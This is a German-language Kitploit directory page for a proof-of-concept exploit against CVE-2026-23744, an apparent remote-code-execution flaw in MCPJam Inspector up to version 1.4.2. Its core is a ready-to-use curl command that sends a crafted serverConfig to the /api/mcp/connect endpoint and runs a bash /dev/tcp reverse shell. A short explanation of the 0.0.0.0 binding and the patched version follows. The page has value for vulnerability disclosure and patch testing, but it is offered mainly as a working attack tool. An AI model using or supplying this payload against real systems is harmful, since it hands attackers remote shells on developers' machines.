Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23744-PoC — Proof-of-Concept-Exploit für CVE-2026-23744, eine Schwachstelle zur Remote-Codeausführung in MCPJam Inspector. Demonstriert RCE mittels manipulierter HTTP-Anfrage an den Endpunkt /api/mcp/connect mit Reverse-Shell-Payload. | Kitploit
Tools/GitHubGitHub/mrr0b0t19/cve-2026-23744-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubmrr0b0t19/cve-2026-23744-poc

CVE-2026-23744-PoC

Proof-of-Concept-Exploit für CVE-2026-23744, eine Schwachstelle zur Remote-Codeausführung in MCPJam Inspector. Demonstriert RCE mittels manipulierter HTTP-Anfrage an den Endpunkt /api/mcp/connect mit Reverse-Shell-Payload.

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23744-PoC

PoC über die Schwachstelle in MCP Server.

automatisiert für den POST-Teil mit dem korrekten Body.

Verwundbarer Pfad:

root@kitploit:~
/api/mcp/connect

Methode per curl:

root@kitploit:~
curl http://evil.com:6274/api/mcp/connect   --header "Content-Type: application/json"   --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'

Warum passiert das?

MCPJam Inspector ist die erste lokale Entwicklungsplattform für MCP-Server. Die Versionen 1.4.2 und früher sind anfällig für die Schwachstelle der Remote-Code-Ausführung (RCE), die es einem Angreifer ermöglicht, eine manipulierte HTTP-Anfrage zu senden, die die Installation eines MCP-Servers auslöst, was zu RCE führt. Da der MCPJam Inspector standardmäßig auf 0.0.0.0 statt 127.0.0.1 hört, kann ein Angreifer das RCE remote über eine einfache HTTP-Anfrage auslösen. Version 1.4.3 enthält einen Patch.

Tool herunterladen